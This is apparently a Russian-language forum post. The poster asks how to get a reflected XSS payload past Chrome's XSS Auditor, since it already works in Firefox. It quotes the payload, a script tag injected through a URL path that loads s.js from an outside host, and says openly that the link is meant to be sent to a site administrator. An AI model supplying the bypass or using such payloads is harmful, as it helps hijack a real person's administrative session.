Хром блокирует исполнение XSS, в Firefox все ок, как можно это побороть, подскажите. The XSS Auditor refused to execute a script in 'http://*****/lib/index.php/"><script src=http://******/s.js></script>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header. мне же админу эту ссылку засылать, а если у него вдруг хром?!)